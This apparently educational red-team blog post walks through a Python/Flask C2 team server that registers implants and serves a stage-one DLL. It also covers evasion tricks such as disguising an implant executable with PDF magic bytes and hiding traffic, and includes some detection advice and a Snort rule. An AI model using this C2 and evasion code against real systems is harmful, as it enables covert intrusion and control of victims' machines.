Maelstrom #3: Building the Team Server

In this post we are discussing building a C2 Teamserver, common pitfalls, and the difficulty of identifying singular malicious requests.

Introduction

In the previous post, , we discussed the general architecture for a Command & Control Framework, including connections from the implant to the server and the execution flow of the implant it'self. This post will continue this architecture discussion, this time looking at the further C2 development considerations around the user interface and experience. We'll also (lightly!) look at how designing and protecting the C2's communication channels.

Objectives

This post will cover:

choosing a user interface from command line, thick / thin clients, and browser-based UIs.
choosing a language for the backend to manage the implants (and the interface)
deciding which actions the C2 will handle for the user, including:
listener initialisation
payload generation
communications security
the choices we made for Maelstrom

As we've mentioned previously, most of the discussions we're going to have in this series will focus on the offensive and defensive actions to take on the C2 implant. However, we still felt it would be worth looking at the points listed above because they are relevant to the implant's behaviour and security. We won't (in this post at any rate) look too much at redirectors, channels, and other parts of the red team infrastructure.

Important Concepts

Our preferred way of handling C2 communications is by using a simple API. HTTP exists in almost every client environment, and where it doesn't, traffic can be handled by intermediary devices (such as the aforementioned redirectors and channels which are so interesting that we won't discuss them here).

Our earlier choice to use an object oriented approach was partially informed by this decision, as the way we modelled the implant helped inform the structure our API should use. By using an OOP approach within the server as well, we found that the API architecture largely wrote it'self. Ensuring that the API is written in a logical and predictable fashion makes future changes and additions so much simpler than having to un-spaghetti your spaghetti.

There are infinite ways to interact with a computer program, depending on how pedantic you feel like being. When it comes to C2's, there are three broad camps:

CLI (such as with Posh and Sliver)
Browser based GUI (such as with Covenant and Mythic)
Client base GUI (such as with Nighthawk, Brute Ratel C4, Havoc, and Cobalt Strike)

These are broad camps, and it's worth stating that a C2 can absolutely have both a command line interface and a graphical interface. Several C2s also support "virtual" CLI interfaces where a browser based GUI mimics or passes through a CLI.

These user interfaces are not necessarily tightly-bound to the server it'self. C2's, especially corporate C2s or those intended to be part of a wider red team infrastructure, will often come with a separate way to interact with a central "team server". A good example of this is Cobalt Strike, where the main team server is remotely accessed by a client on the operator's local machine.

Design Matters

With a clear design and a usable UI, opsec becomes more than just muscle memory and runes.

Choosing a frontend

Lets look at some examples of contempory C2s which implement the different options, and some libraries which could help you achieve a similar experience:

Examples

C2s

Libraries worth a look

Web Application

C2s

Libraries worth a look

GUI

C2s

Libraries worth a look

Choosing a backend

Golang was able to handle the loads extremely well, whilst being easy to develop. Rust on the other hand, was up and down whilst being a lot more difficult to actually write. Albeit this server was not a malware-oriented team-server, but the data is something to consider.

With that said, we are going to work with Flask/Python, purely out of ease for this demonstration.

One final note here before we move on to code - outside of what we're discussing, this code is deliberately dependent on insecure behaviours. Maelstrom is just for demonstration purposes. Some of these red herrings will become obvious throughout the next few blog posts.

Quick talk on Protocols

When it comes to commmuncation, there are a multitude of protocols that should be considered.

HTTP

Uris
Headers
Body

Lets take a look at an example:

GET /endpoint/form HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: length
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

licenseID=string&content=string&/paramsXML=string

licenseID=string&content=string&/paramsXML=string&C2Info=AAAAAA

To be honest, explaining HTTP specifically for C2 communication could be an entire blog in-of-itself. So we will leave HTTP here. But, this is the communication we will be using for our proof-of-concept.

DNS

Today, the DNS Beacon can download tasks over DNS TXT records, DNS AAAA records, or DNS A records. This payload has the flexibility to change between these data channels while its on target. Use Beacon’s mode command to change the current Beacon’s data channel. mode dns is the DNS A record data channel. mode dns6 is the DNS AAAA record channel. And, mode dns-txt is the DNS TXT record data channel. The default is the DNS TXT record data channel.

The only issue with this is that its substantially slower than HTTP but provides better protections as these channels are less inspected than HTTP.

SMB

Similarly to DNS, this is something we arent implementing but we recommended this protocol to be implemented, whereas DNS is somewhat optional and dependant on the usecase for the end-user.

Introducing Maelstrom

Now that we have overloaded you with options, let's look into how Maelstrom is going to work.

Server

First up, the server. This is the component that the implant will respond to. So, when maelstrom.py is run in the terminal, the following is printed:

usage: Maelstrom [-h] {server,payload} ...

positional arguments:
  {server,payload}  Start Server | Generate Payloads
    server          Start the Maelstrom Server
    payload         Generate a Maelstrom Payload

optional arguments:
  -h, --help        show this help message and exit

Example:
  - Run Server:
    python3 maelstrom.py server
    
  - Generate Payload:
    python3 maelstrom.py payload

There are two options:

Run the server
Generate a payload

However, we are only implementing the server:

def main() -> None:
    args = Args.get_args()
    if args.which == 'server':
        run_maelstrom()

    return

if __name__ == "__main__":
    main()

Lets step through run_maelstrom()...

The very first thing it does is get the available commands:

commands: dict = get_commands()

Where get_commands() is:

def get_commands() -> dict:
    """convert the list of commands into the complete data structure"""
    cs: dict = {}

    commands: list = available_commands()
    for command in commands:
        cs[command.name] = command.sub_args

    return cs

This function parses the return of available_commands and builds out a dictionary of the required info.

In Maelstrom these commands are somewhat hardcoded, limiting it's extensibility:

def available_commands() -> list:
    """Store all the commands and return as a list of dataclasses"""
    
    exit_cmd: Command = Command(
        'exit',
        'Exit Maelstrom','Exit Maelstrom',
        None)

    help_cmd: Command = Command(
        'help',
        'Show all the available commands',
        'Show all the available commands',
        None)

    set_cmd: Command = Command(
        'listener',
        'Start a new listener',
        'Start a new listener by specifying a host, port, uri, and password',
        None)

    show_cmd: Command = Command(
        'show',
        'Show listeners|implants',
        'Show listeners|implants',
            {
                "listeners": None,
                "implants": None
            }
        )

    # return all command dataclasses as a list
    return [exit_cmd, help_cmd, set_cmd, show_cmd]

from dataclasses import dataclass, field

@dataclass(order=True)
class Command:
    """Dataclass to hold the command info"""

    # command name
    name: str

    # command description (long)
    long_desc: str

    # command description (short)
    short_desc: str

    # sub arguments
    sub_args: dict     

    # allow it to be sorted on size
    def __post__init(self):
        self.sort_index = self.size

So, get_commands() again:

def get_commands() -> dict:
    """convert the list of commands into the complete data structure"""
    cs: dict = {}

    commands: list = available_commands()
    for command in commands:
        cs[command.name] = command.sub_args

    return cs

Running the server and typing help shows this:

These match up to the dataclasses seen earlier:

exit_cmd: Command = Command(
    'exit',
    'Exit Maelstrom','Exit Maelstrom',
    None)

help_cmd: Command = Command(
    'help',
    'Show all the available commands',
    'Show all the available commands',
    None)

set_cmd: Command = Command(
    'listener',
    'Start a new listener',
    'Start a new listener by specifying a host, port, uri, and password',
    None)

show_cmd: Command = Command(
    'show',
    'Show listeners|implants',
    'Show listeners|implants',
        {
            "listeners": None,
            "implants": None
        }
    )

Because this is a lazy implementation of the server, the next thing to happen is a big while loop which gives a prompt and parses commands:

# bool used to control the while loop
execute: bool = True

# username to print
username: str = getpass.getuser()

# run until told otherwise
while execute:

    # get the user input
    user_input: str = prompt(f'[{username}]> ', completer=completer)

    # if nothing is passed, just continue
    if not user_input: continue

    # Exit
    if user_input.startswith('exit'):
        execute = False

    # Help
    elif user_input.startswith('help'):
        print_help(user_input)

    # Listener
    elif user_input.startswith('listener'):
        handle_listener(user_input)

    elif user_input.startswith('show'):
        handle_show(user_input)
return

The ONLY functionality maelstrom provides is the ability to create listeners and show connected implants. However, lets discuss post-exploitation briefly (we discuss this much later on in the series in a bit more depth).

For the sake of the discussion, our example command will be whoami. If you were to go onto the C2 Matrix, and pick a C2 that isn't .NET, you'd have a 90% chance of getting this:

cmd.exe /c whoami

Which will subsequently produce the following process tree:

-> implant.exe
  -> cmd.exe
    -> whoami.exe

BOOL GetUserNameA(
  [out]     LPSTR   lpBuffer,
  [in, out] LPDWORD pcbBuffer
);

So.. why not use it:

CHAR lpUserName[MAX_PATH];
DWORD nSize = MAX_PATH;

if (!GetUserNameA(lpUserName, &nSize))
{
    return NULL;
}

std::string GetProcessCurrentDirectory() {
    PRTL_USER_PROCESS_PARAMETERS processParams = (PRTL_USER_PROCESS_PARAMETERS)_pPEB->ProcessParameters;
    UNICODE_STRING us = processParams->CurrentDirectoryPath;

    std::wstring ws(us.Buffer, us.Length / 2);
    std::string ss(ws.begin(), ws.end());
    return ss;
}

More on this in a later part. For now, listeners!

Listeners

Lets take a look at how we implemented listener creation. If the user input start on the CLI starts with listener then the handle_listener() function is called:

elif user_input.startswith('listener'):
    handle_listener(user_input)

First thing that happens is that it tries to find a space to assume that the input is correct:

def handle_listener(user_input: str) -> None:
    usage = 'Usage: listener <host> <port> <base uri> <password>'
    if ' ' not in user_input:
        print(usage)
        return

If that is fine, it then split's on the space and counts the length. If it's not 5, then the command is wrong:

# split out the command
split: list = user_input.split(' ')

# make sure all the components are passed
if len(split) != 5:
    print(usage)
    return

Note the usage here:

usage = 'Usage: listener <host> <port> <base uri> <password>'

A valid input would be:

listener 127.0.0.1 5555 /some-uri PassWoRd1

As the first index, 0, should be the command name, it attempts to validate it:

# use the first element to get the comand object
command: Command = get_a_command(split[0])

# if it doesnt exist, return
if not command:
    print('Failed to find command!')
    return

Like so:

def get_a_command(select: str) -> Command:
    """Get a specific command"""
    return[c for c in available_commands() if select == c.name]

The dataclass returned is never used, but it's just checked to see if the command is valid. Now that it is, the Listener dataclass can be used to pass the information into the class, like so:

listener: Listener = Listener(random_string(), split[0], split[1], split[2], split[3])

Where the dataclass is:

@dataclass(order=True)
class Listener:
    """Dataclass to hold the listener info"""

    # name
    name: str
    
    # listener address
    address: str

    # port
    port: int

    # uri
    uri: str

    # password
    password: str

This is then appended to a global list:

# add the listener to the list
listeners.append(listener)

This is obviously not persistent. Realistically, this should be a database which is checked and restored if the server is restarted:

Next, the dataclass is used as an argument for a thread:

# start a thread pointing at the start_server function
try:
    thread = threading.Thread(target=start_server, args=(listener,))
    thread.daemon = True
    thread.start()
    logger.good(f'Started: [{listener.name}] http://{listener.address}:{listener.port}{listener.uri} ({listener.password})')
except Exception as e:
    logger.bad(f'Failed to start listener: {str(e)}')

return

def start_server(listener: Listener) -> bool:
    """callback function to start a server"""
    # add the uri
    app.add_url_rule(listener.uri, view_func=comms)

    # start the app
    try:
        app.run(host=listener.address, port=listener.port, debug=False, threaded=True)
        return True
    except:
        return False

This completes the listener creation:

This can be validated by running:

curl -s "http://10.10.11.205:5555/a?stage" -H "X-Maelstrom: password"|xxd|head

Which produces:

So, how does the implant communicate with this?

Payloads

if os.system(f"make -f {make_file_path} dll 2>/dev/null 1>&2") == 0:
    print("success")
else:
    print("failure")

More on what to consider for payload generation in the next blog post.

Implant Communication

At this point in the post, we have a up and running team server which can create a listener. Now we need to look at what the endpoints actually do with incoming traffic to:

Determine if it's an implant
If it is, allow the implant to communicate

Handling HTTP Requests

Earlier in the post, we showed the listener being started as a new app, like so:

app.run(host=listener.address, port=listener.port, debug=False, threaded=True)

In a typical Flask fashion, app is defined globally:

app = Flask(__name__)

And one function on / is created to handle all requests. We could start an endpoint for each type, but we found it easier to listen at the root, and filter down with logic. This allows us to log ALL requests, whilst meticulously filtering requests by their expected values.

The route:

@app.route('/', methods=["GET"])
def comms() -> Response:
    pass

Lets run through what happens inside this route. In the previous section, we created an endpoint on /a, so we will use that example.

First thing that happens here is that a bunch of information is pulled from the request object, things that we may or may not use:

user_agent = request.environ["HTTP_USER_AGENT"]
verb = request.environ["REQUEST_METHOD"]
uri = request.environ["RAW_URI"]
remote_addr = request.environ["REMOTE_ADDR"]
remote_port = request.environ["REMOTE_PORT"]
server_name = request.environ["SERVER_NAME"]
server_port = request.environ["SERVER_PORT"]
url = request.url
header = request.headers.get('X-Maelstrom')

Note the request.headers.get call. This is one of the hard-coded values sent between the client and server.

This information is then passed to the is_valid_listener function:

if not is_valid_listener(listeners, uri, server_name, server_port, header): return response

This just ensures that the dataclass information matches up to the request by ensuring that the URI, Server Address, Server Port, and Header are all correct:

def is_valid_listener(listeners: list, uri: str, server_name: str, server_port: str, header) -> bool:
    """ensure that the request is valid for the endpoints."""
    for listener in listeners:
        # The 'in' here is important. This is what allows for the rest of the uri to be valid. I.E: /a?aaaaa would work.
        if listener.uri in uri and listener.address == server_name and str(listener.port) == server_port and listener.password == header:
            return True
    return False

This is an extremely primitive example of ensuring the request is as intended...

If it is valid, then the next chunk of code determines which type of request this is:

switch: str = ''

# if no data is passed
if len(request.data) == 0:
    # check if the uri contains ?stage
    if check_uri_for_stage(uri):
        # if it does, set 'switch' to 'stage'
        switch = 'stage'
else:
    # otherwise, see whats going on in the json
    j = parse_json(request.data)
    if not j: return response

    if len(j.keys()) != 1: return response

    switch: str = list(j.keys())[0]

In this case, it only has two options:

init
stage

In a real world example, init and stage are terrible endpoints. But this allows us to illustrate out point. This is then followed up with:

# if the switch is init:
if switch == "init":
    # add the implant data to the 'db' and keep track of it
    response = initialise_implant(j, request)
elif switch == "stage":
    # otherwise if it's stage, return the dll
    response = get_maelstrom_dll()
else:
    # uh-oh...
    response = ""

# return the response
return response

If it's of type init, then initialise_implant() simply parses the info and prints a new connection, thats all:

def initialise_implant(j: dict, request) -> str:
    """Store the beacon info and return a success message"""

    try:
        processname: str = j["init"]["processname"]
        computername: str =j["init"]["computername"]
        username: str = j["init"]["username"]
        pid: int = j["init"]["dwpid"]
        remote_addr = request.environ["REMOTE_ADDR"]
        remote_port = request.environ["REMOTE_PORT"]
        uid = random_string()

        implant: Implant = Implant(uid, remote_addr, remote_port, processname, computername, username, pid)
        
        implants.append(implant)
        logger.good(f"New Implant: ({uid}) {computername}\\{username} @ {remote_addr}:{remote_port}")
        return "success"
    except Exception as e:
        logger.bad(f"Failed to add implant: {str(e)}")
        return "failure"

There is poor error handling, no database tracking, nothing. Realistically, here there is a requirement for logging. No matter the request, it should be logged into a uniform format. Typically, what we found best with our projects is to use a file where each line is a JSON Object:

{"example": 0}
{"example": 1}
{"example": 2}
{"example": 3}
{"example": 4}

This is then easy to process by either:

Looping over every line and loading each line as a JSON Object

input {
    beats {
        port => 5044
    }

    tcp {
        port => 5000
    }

    http {
        port => 5043
    }
}

filter {
  json {
    source => "message"
      tag_on_failure => [ "_parsefailure", "parsefailure-critical", "parsefailure-json_codec" ]
      remove_field => [ "message" ]
      skip_on_invalid_json => true
  }
}

output {
    elasticsearch {
        hosts => "elasticsearch:9200"
        user => "logstash_internal"
        password => "${LOGSTASH_INTERNAL_PASSWORD}"
    }
}

Or a POST:

def post_to_logstash(data: dict, url: str) -> bool:
    """Post the json to the logstash url"""
    try:
        response = requests.post(
            url, data=json.dumps(data), headers={"Content-Type": "application/json"}
        )
        return True
    except Exception as e:
        bad(f"Failed to post to {url}: {str(e)}")
        return False

Depending on the project, we will use one of these methods.

Moving onto the staging endpoint, then a hardcoded path is returned:

def get_maelstrom_dll() -> bytes:
    """Read bytes from the DLL and return it!"""

    dllpath = Path('agent/stage1/bin/maelstrom.x64.dll')

    if not dllpath.exists():
        logger.bad(f'{dllpath.name} doesn exist!')
        return ""
    
    dllbytes: bytes

    try:
        with open(dllpath,'rb') as f:
            dllbytes = f.read()
    except Exception as e:
        logger.bad(f'Failed to get {dllpath.name}: {str(e)}')
        return ""

    if dllbytes:
        logger.info(f'Sending Stage 1 ({len(dllbytes)} bytes)!')
        return dllbytes
    else:    
        return ""

Again, this is intentional. We don't care for making this fancy, it's a proof-of-concept. In the next section, we go over some methods of masking the DLL, and this is where that logic would go. But, for Maelstrom, we just return the bytes of a hard-coded DLL Path.

From here, multiple switches could be implemented to do specific jobs like get a new task, or return information about a task ran. Each of these endpoints could be configured differently, giving flexibility within the communcation.

To recap, in this section we've shown two hard-coded endpoints, init and stage, and then filter down the requests based on expected information. To illustrate our point, we've just used X-Maelstrom as the header. But realistically this could just be genuine headers like ASPSESSIONID. All we are doing is making sure that only very specific requests can communicate with the teamserver.

Inspecting the requests

http && ip.src_host == 10.10.11.222 && ip.dst_host == 10.10.11.205

Remember, the only thing this does is stage. There are no additional requests:

The above shows the /a?stage URI being requested, along with our poorly configured headers:

GET /a?stage HTTP/1.1
Connection: Keep-Alive
Referer: https://google.com
User-Agent: Maelstrom
X-Maelstrom: password
Host: 10.10.11.205:5555

And as this is a stage, if we follow it in TCP Stream...

alert tcp any any -> any 5555 (content:"X-Maelstrom"; msg:"Maelstrom Header Detected!"; sid:10000100; rev:005;)

Which looks something like this:

There are tons of improvements that could be made here, and it could get complicated very quickly with all sorts of masquerading and cryptography. However, it doesn't need to be that complicated (some people may need it to be, though). As long as the HTTP Requests are fully customizable by the end-user, then the request can be crafted however it needs to be. For those complicated engagements with every log being ingested, then cool, the request can be worked to fix that. Don't need anything? Cool, then just request /stage.

client {
     parameter "id" "1234"; 
     header "Cookie" "SomeValue";
}

What is particularly good is their chained data manipulation:

server {
     header "Content-Type" "image/gif"; 
     output {
          prepend "GIF89a"; 
          print;
     }
}

In the above the GIF89a type is used which uses the magic bytes of a GIF and adds it to the end. Alternatively, this could be done by appending PNG magic bytes.

An example implementation with a PDF, assume the following data as the magic bytes for a PDF:

%PDF-1.4

\x25\x50\x44\x46\x2d\x31\x2e\x34

Then, with the following command, prepend those bytes to an EXE:

echo -n -e '\x25\x50\x44\x46\x2d\x31\x2e\x34' | /usr/bin/cat - maelstrom.unsafe.x64.exe > maelstrom.unsafe.pdf.exe

Finally, running file on both:

Now all that needs to happen is the first 8 bytes are removed from the buffer...

Extensible Obfuscation and Encryption

From a user experience standpoint, these behaviours can easily be extended by the server. These steps should be invisible to the operator, but applying them should be straightforward. Older C2s were more reliant on users customising this behaviour directly, by modifying the implants and droppers, if it was changeable at all. Most C2s could have the endpoint changeable, but even then this was less common.

Supporting these behaviours with the extensible approach to implant development we outlined in the previous post using simple software development practices massively improves the opsec of the implant. Buzz-words like polymorphic code and military grade encryption aren't helpful when discussing these steps, since so many contempory C2s still rely on these opsec behaviours being hard-coded. This results in red teams who have a C2 with one opsec implant and a C2, rather than a C2 with a library of modular steps capable of generating infinite opsec implants.

For example, the following behaviours could be added to a C2's payload generation to further obfuscate implant data:

Hardcoded embedded environment keying where keys are generated on a payload by payload basis (coming next week!)
Obfuscation steps such as XOR and encryption

Obviously, these are completely rudimentary but it proves the point. Blue teams know that big blobs of high entropy data going back and forth between never-before-seen Azure and AWS instances are a lil' sus. As live traffic inspection becomes more widespread, we anticipate that C2s will shift to a more modular approach where implants can switch their data obfuscation and encryption on the fly, reducing the ability of a blue team to identify an implant.

This post has been a little lighter on the blue team side of affairs for a simple reason - this is really difficult to identify already at a network level, in the world of hardcoded implant opsec, without including any other factors like destinations, EDR flags, or other heuristics. Identifying a single malicious request every 20 minutes to 2 hours, travelling over an established channel such as Microsoft Teams is like trying to find a needle in a haystack made of needles. Only by paying close attention to endpoint telemetry, deep-packet inspection of all network traffic to look for anything specific when a process is flagged as suspicious can these be identified. Ensuring that your EDR and network devices are up-to-date with domain reputation and threat intelligence feeds, and that these are being ingested appropriately, may go some way to closing this gap.

To recap:

Maelstrom's communcation's extremely simple. With that said, it's quite unlikely that a tool will spot these unless specifically told to. A good analyst may spot them, but this again is unlikely. Remember, we made it this way on purpose.
Ensure that the requests are fully malleable for end-users. Even though we gave an example file magic bytes, the data could also be embedded into something else. Like a base64 blob inside JavaScript and put in the body of the request:

function F()
{
    var blob = "something base64";
}

Conclusion

This post has been more of a reference post, depending on the type of user experience, there are tons of different methods. For Maelstrom, it's only going to be a basic python CLI with the Prompt Toolkit.

Now that this has all been set up, we can finally get into coding the implant in the next post!

We mentioned at the start that we wouldn't be addressing channels, redirectors, or other parts of the red team infrastructure. As some honourable mentions, the following three blogs are a great starting point:

PreviousMaelstrom #4: Writing a C2 Implant NextMaelstrom #2: The C2 Architecture

Last updated 1 year ago